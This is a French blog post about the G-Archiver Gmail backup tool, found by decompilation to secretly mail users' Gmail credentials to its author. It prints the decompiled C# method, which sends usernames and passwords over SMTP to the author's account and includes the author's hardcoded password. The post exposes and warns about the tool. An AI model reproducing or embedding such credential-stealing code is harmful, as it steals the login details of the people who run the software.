Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Un programmeur reconverti en voleur de mot de passe Gmail

@  — 

garchiver.jpg

Article plutôt amusant (enfin, ça dépend du point de vue) chez Coding Horror ou on apprend qu’un mec qui cherchait une bonne solution pour faire un backup de son compte Gmail sur son disque dur a acheté le logiciel G-Archiver au prix de 30 $

Et comme ce petit gars est un curieux, il a commencé à fouiller le code (compilé) du logiciel en utilisant Reflector (un analyseur de classes pour les programmes .NET) et à découvert que le créateur du logiciel, John Terry avait codé en dur son propre nom d’utilisateur gmail et son mot de passe dans l’application.

Voici le code :

public static void CheckConnection(string a, string b)

{

try

{

MailMessage message = new MailMessage();

message.To.Add("[email protected]");

message.From = new MailAddress("[email protected]", "JTerry", Encoding.utf8mb4);

message.Subject = "Account";

message.SubjectEncoding = Encoding.utf8mb4;

message.Body = "Username: " + a;

message.Body = message.Body + "rnPassword: " + b;

message.BodyEncoding = Encoding.utf8mb4;

message.IsBodyHtml = false;

message.Priority = MailPriority.High;

SmtpClient client = new SmtpClient();

client.Credentials = new NetworkCredential("[email protected]", "bilal482");

client.Port = 0x24b;

client.Host = "smtp.gmail.com";

client.EnableSsl = true;

client.Send(message);

}

catch (Exception)

{

}

}

Le petit curieux s’est donc connecté au compte gmail du John Terry et a constaté avec horreur ceci :

horror.jpg

Plus de 1700 emails contenant les passwords de tous les gens qui ont utilisé ce logiciel de backup Gmail… Pas de doute ici, le programmeur John Terry est un affreux jojo !!

Le petit curieux ne l’a pas non plus joué très fine. Il a carrément supprimé tous les messages, a changé le mot de passe du compte Gmail puis a contacté Google pour faire fermer ce compte… Pourquoi je dis qu’il ne l’a pas joué très fine ? Car il a détruit les preuves…

Que faire quand on découvre ce genre de chose ? Agir au plus rapide pour le bien de tous ?  Ou prévenir la police ?

N’empêche, ça fait réfléchir sur l’éthique plus que scrupuleuse de certains programmeurs. Vous serez peut être plus prudents à l’avenir avant de confier vos identifiant à n’importe quelle application (freeware ou non).

Enfin, de là à décompiler tout ce qui bouge, faut pas abuser quand même…Quoi que…

Peut être que chez Webrankinfo, ils utilisaient aussi ce soft ?

A bon entendeur…

Comment supprimer vos données personnelles d’Internet avec Incogni ?

Espace partenaire

🔒Votre vie privée est-elle vraiment privée❓

😮Vous l’ignorez peut-être, mais des sociétés appelées Data Brokers collectent, agrègent et monnaient vos données personnelles sans votre consentement.

📝Votre nom, votre prénom, votre date de naissance, 📧 votre email, 🏠 votre adresse postale, et bien d’autres informations sont ainsi collectés pour être revendus à des publicitaires. Il est donc temps de reprendre le contrôle de vos informations personnelles grâce à Incogni

🛡️Incogni est un service qui se charge pour vous de contacter ces Data Brokers et d’exiger la suppression de vos données personnelles.

💥 Profitez d’une offre spéciale avec le code INCOGNI60 et ne laissez pas votre vie privée entre de mauvaises mains❗🙅‍♀️

👇🔍 CLIQUEZ ICI POUR EN SAVOIR PLUS 🔍👇

Les articles du moment